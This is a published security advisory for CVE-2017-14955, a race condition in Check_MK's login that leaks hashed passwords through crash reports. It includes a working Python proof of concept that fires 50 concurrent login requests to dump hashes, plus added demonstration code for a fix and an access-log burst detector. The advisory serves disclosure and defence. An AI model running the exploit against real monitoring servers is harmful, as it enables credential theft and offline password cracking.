Check_MK 1.2.8p25 - Information Disclosure

Author:       Julien Ahrens
Platform:     python
Release date: 2017-10-18

1. ADVISORY INFORMATION
=======================
Product:        Check_mk
Vendor URL:     https://mathias-kettner.de/check_mk.html
Type:           Race Condition [CWE-362]
Date found:     2017-09-21
Date published: 2017-10-18
CVSSv3 Score:   7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE:            CVE-2017-14955


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
Check_mk v1.2.8p25
Check_mk v1.2.8p25 Enterprise
Older versions may be affected too.


4. INTRODUCTION
===============
Check_MK is a comprehensive IT monitoring solution in the tradition of Nagios.
Check_MK is available as Raw Edition, which is 100% pure open source, and as
Enterprise Edition with a lot of additional features and professional support.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
Check_mk is vulnerable to an unauthenticated information disclosure through a
race condition in the authentication process, triggered by authenticating with
a valid username and an invalid password.

On a failed login, the application calls the function save_users(), which
performs two os.rename operations on the files "contacts.mk.new" and
"users.mk.new" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):

[..]
   # Check_MK's monitoring contacts
   filename = root_dir + "contacts.mk.new"
   out = create_user_file(filename, "w")
   out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
   out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
   out.close()
   os.rename(filename, filename[:-4])

   # Users with passwords for Multisite
   filename = multisite_dir + "users.mk.new"
   make_nagios_directory(multisite_dir)
   out = create_user_file(filename, "w")
   out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
   out.write("multisite_users = \\\n%s\n" % pprint.pformat(users))
   out.close()
   os.rename(filename, filename[:-4])
[...]

When sending many concurrent authentication requests with an existing/valid
username, such as:

POST /check_mk/login.py HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
Content-Length: 772
Connection: close
Upgrade-Insecure-Requests: 1

---9519178121294961341040589727
Content-Disposition: form-data; name="filled_in"

login
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

1
---9519178121294961341040589727
Content-Disposition: form-data; name="_origtarget"

index.py
---9519178121294961341040589727
Content-Disposition: form-data; name="_username"

omdadmin
---9519178121294961341040589727
Content-Disposition: form-data; name="_password"

welcome
---9519178121294961341040589727
Content-Disposition: form-data; name="_login"

Login
---9519178121294961341040589727--

Then one of the two os.rename() calls can reference a file that no longer
exists, because a concurrent request has already renamed it. The Python script
fails and Check_mk renders a crash report, which discloses a variety of
sensitive information, such as internal server paths and account details
including hashed passwords:

</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
                             'contactgroups': ['all'],
                             'disable_notifications': False,
                             'email': u'admin@example.com',
                             'enforce_pw_change': False,
                             'last_pw_change': 0,
                             'last_seen': 0.0,
                             'locked': False,
                             'num_failed': 0,
                             'pager': '',
                             'password': '$1$400000$13371337asdfasdf',
                             'roles': ['admin'],
                             'serial': 2},

A script to automatically exploit this vulnerability can be found on [0].
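The following Python script is an added illustration and is not part of the advisory or of Check_mk's own code. It replays the losing interleaving described above deterministically: two writers share the fixed "<name>.new" temporary path, exactly as save_users() does, so the second os.rename() finds the temp file gone. It contrasts that with a hardened writer (an assumed fix, not necessarily the vendor's) that gives every caller its own mkstemp() file in the target directory and publishes it with os.replace(). A second helper runs 50 real threads through each writer, mirroring the advisory's 50 concurrent requests. All class and function names are the example's own.

```python
import os
import tempfile
import threading


class FixedNameWriter:
    """Mirrors the advisory's pattern: every caller writes the same '<name>.new'
    temporary path, so two concurrent callers share one temp file."""

    def __init__(self, root, name, content):
        self.tmp = os.path.join(root, name + ".new")
        self.final = os.path.join(root, name)
        self.content = content

    def write_tmp(self):
        with open(self.tmp, "w") as out:
            out.write(self.content)

    def publish(self):
        # Same as os.rename(filename, filename[:-4]) in save_users()
        os.rename(self.tmp, self.final)


class UniqueNameWriter:
    """Hardened variant (assumption, not the vendor's fix): each caller gets a
    private mkstemp() file in the target directory and swaps it in atomically."""

    def __init__(self, root, name, content):
        fd, self.tmp = tempfile.mkstemp(prefix=name + ".", suffix=".new", dir=root)
        os.close(fd)
        self.final = os.path.join(root, name)
        self.content = content

    def write_tmp(self):
        with open(self.tmp, "w") as out:
            out.write(self.content)
            out.flush()
            os.fsync(out.fileno())  # data is on disk before it becomes visible

    def publish(self):
        os.replace(self.tmp, self.final)  # atomic on POSIX, same filesystem


def interleaved_outcome(writer_cls):
    """Replay the losing schedule: A and B both write their temp file,
    A publishes, then B publishes. Returns the exception class name B hits,
    or the final file content when nothing goes wrong."""
    root = tempfile.mkdtemp()
    a = writer_cls(root, "users.mk", "A")
    b = writer_cls(root, "users.mk", "B")
    a.write_tmp()
    b.write_tmp()
    a.publish()
    try:
        b.publish()
    except OSError as exc:
        return type(exc).__name__
    with open(os.path.join(root, "users.mk")) as fh:
        return fh.read()


def concurrent_errors(writer_cls, num=50):
    """Run `num` threads through write_tmp()+publish(); a barrier makes every
    temp file exist before any rename, so the collision is forced, not lucky.
    Returns how many threads raised an OSError."""
    root = tempfile.mkdtemp()
    errors = []
    barrier = threading.Barrier(num)

    def worker(i):
        w = writer_cls(root, "contacts.mk", "worker-%d" % i)
        w.write_tmp()
        barrier.wait()
        try:
            w.publish()
        except OSError as exc:
            errors.append(type(exc).__name__)

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(num)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return len(errors)


if __name__ == "__main__":
    print("fixed name, interleaved :", interleaved_outcome(FixedNameWriter))
    print("unique name, interleaved:", interleaved_outcome(UniqueNameWriter))
    print("fixed name, 50 threads  :", concurrent_errors(FixedNameWriter), "errors")
    print("unique name, 50 threads :", concurrent_errors(UniqueNameWriter), "errors")
```

With the shared temp path, exactly one of the 50 renames succeeds and the other 49 raise FileNotFoundError; with a private temp file per caller none fail and the last writer's content wins, which is the intended last-write semantics. Independently of the rename fix, an error path reachable by unauthenticated clients should never render local variables: the crash report is what turned an ordinary exception into a leak of password hashes.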

6. POC
======

#!/usr/bin/python
# Exploit Title: Check_mk <= v1.2.8p25 save_users() Race Condition
# Version:       <= 1.2.8p25
# Date:          2017-10-18
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      https://www.rcesecurity.com
# Software Link: https://mathias-kettner.de/check_mk.html
# Tested on:     1.2.8p25
# CVE:           CVE-2017-14955
#
# Howto / Notes:
# This script exploits the Race Condition in check_mk version 1.2.8p25 and
# below as described by CVE-2017-14955. You only need a valid username to
# dump all encrypted passwords and make sure to set up a local proxy to
# catch the dump. Happy brute forcing ;-)

import requests
import threading

try:
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except:
    pass

# Config Me
target_url = "https://localhost/check_mk/login.py"
target_username = "omdadmin"

proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080',
}

def make_session():
    # Every field is sent as a multipart/form-data part (filename=None),
    # matching the login request shown in section 5
    v = requests.post(target_url, verify=False, proxies=proxies,
                      files={'filled_in': (None, 'login'),
                             '_login': (None, '1'),
                             '_origtarget': (None, 'index.py'),
                             '_username': (None, target_username),
                             '_password': (None, 'random'),
                             '_login': (None, 'Login')})
    return v.content

NUM = 50

threads = []
for i in range(NUM):
    t = threading.Thread(target=make_session)
    threads.append(t)
    t.start()

7. RISK
=======
To successfully exploit this vulnerability an unauthenticated attacker must only
have network-level access to the application.

The vulnerability allows remote attackers to trigger an exception, which
discloses a variety of sensitive internal information such as:
- Local server paths
- Usernames
- Passwords (hashed)
- and user directory-specific attributes (e.g. LDAP)
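Because triggering the race requires a burst of login POSTs from one client within a second or two, the attempt is easy to spot in the web server's access log. The following Python script is an added example, not part of the advisory; it parses Apache common-format lines (the format of the server fronting Check_mk is an assumption) and flags any source IP whose POSTs to /check_mk/login.py exceed a threshold inside a sliding time window. The log lines are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache common log format: ip ident user [ts] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
LOGIN_PATH = "/check_mk/login.py"


def build_sample_log():
    """Constructed sample: three human-paced logins from 192.0.2.10 spread over
    a minute, then 50 POSTs from 10.0.0.5 packed into two seconds."""
    base = ('{ip} - - [18/Oct/2017:10:00:{sec:02d} +0000] '
            '"POST /check_mk/login.py HTTP/1.1" 200 5120')
    lines = [base.format(ip="192.0.2.10", sec=s) for s in (0, 30, 59)]
    lines += [base.format(ip="10.0.0.5", sec=5 + (i // 25)) for i in range(50)]
    lines.append('192.0.2.10 - - [18/Oct/2017:10:01:10 +0000] '
                 '"GET /check_mk/index.py HTTP/1.1" 200 880')
    return "\n".join(lines)


def detect_login_bursts(log_text, window_seconds=2, threshold=20):
    """Return {ip: peak_count} for every client that sent at least `threshold`
    login POSTs within any `window_seconds`-wide window."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST" or m.group("path") != LOGIN_PATH:
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        events[m.group("ip")].append(ts)

    alerts = {}
    for ip, stamps in events.items():
        stamps.sort()
        start = 0
        peak = 0
        # Sliding window: advance `start` until the window is narrow enough
        for end, t in enumerate(stamps):
            while (t - stamps[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = peak
    return alerts


if __name__ == "__main__":
    for ip, count in detect_login_bursts(build_sample_log()).items():
        print("ALERT %s: %d login POSTs within 2s" % (ip, count))
```

The threshold is deliberately well above anything a person or a browser retry produces, so the rule stays quiet on the normal attempts from 192.0.2.10 and fires only on the 50-request burst. Pair it with an alert on the monitoring host's own crash-report output if that is logged, since a crash report following such a burst is the strongest indicator that the race was actually won.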


8. SOLUTION
===========
Update to 1.2.8p26.


9. REPORT TIMELINE
==================
2017-09-21: Discovery of the vulnerability
2017-09-21: Sent limited information to publicly listed email address
2017-09-21: Vendor responds and asks for details
2017-09-21: Full vulnerability details sent to vendor
2017-09-25: Vendor pushes fix to git
2017-10-01: MITRE assigns CVE-2017-14955
2017-10-16: Fix confirmed
2017-10-18: Public disclosure


10. REFERENCES
==============
[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/
[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955